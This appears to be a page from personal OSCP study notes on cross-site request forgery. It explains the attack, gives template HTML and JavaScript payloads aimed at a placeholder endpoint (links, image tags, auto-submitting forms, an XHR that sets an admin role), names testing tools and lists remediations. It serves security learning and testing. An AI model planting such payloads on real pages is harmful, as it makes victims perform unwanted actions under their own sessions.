Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • How CSRF Works
  • Payloads
  • Tools
  • Remediation
  1. Menu
  2. Vulnerability Methods

CSRF (Cross-Site Request Forgery)

How CSRF Works

Via a CSRF attack, the attacker can bypass the authentication process or perform actions with higher privileges. What to do to execute this attack:

  1. Create the custom payload

  2. Embed the request into a hyperlink

  3. Trick the victim into clicking the link which will send your request to the website.

  4. Forge the request to conduct malicious action

This attack only works if the victim is an authenticated user because when the request is made, the application will check if the cookies of a valid session are available. If the relevant cookies are available, those will need to be sent with the request. If the session is valid and the website approves the sent cookies, CSRF attack becomes successful.

This attack only works if the victim is an authenticated user because when the request is made, the application will check if the cookies of a valid session are available. If the relevant cookies are available, those will need to be sent with the request. If the session is valid and the website approves the sent cookies, the CSRF attack will be successful.

Payloads

Some payloads that can be used during CSRF attacks can be found below:

--------------------------------------------------------------------
HTML GET:
<a href=”http://vulnerable/endpoint?parameter=CSRFd">Click</a>
--------------------------------------------------------------------
HTML GET (no interaction):
<img src=”http://vulnerable/endpoint?parameter=CSRFd">
--------------------------------------------------------------------
HTML POST:
<form action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
--------------------------------------------------------------------
HTML POST (no interaction):
<form id="autosubmit" action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
--------------------------------------------------------------------
JSON GET:
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://vulnerable/endpoint");
xhr.send();
</script>
--------------------------------------------------------------------
JSON POST:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://vulnerable/endpoint");
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.send('{"role":admin}');
</script>
--------------------------------------------------------------------

Tools

Remediation

The most popular prevention method is adding an Anti-CSRF Token which will be associated with a particular user to prevent CSRF attacks. Another known prevention method is adding Same-Site flag to Cookies which will check if the origin of the request sender is the same as the Cookie owner. The following suggestions can be listed as Suggestions for CSRF attacks.

  • Use CSRF token in HTTP header and match its value on server side.

  • Do not use GET HTTP method for critical operations such as Create/Update/Delete

  • Implement “Same-site” Attribute to cookies.

PreviousLFI / RFI (Local / Remote File Inclusion)NextSession Fixation

Last updated 3 years ago

Burp has a tool that will help create payloads.

is an advanced (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability.

Generate CSRF PoC
XSRFProbe
Cross Site Request Forgery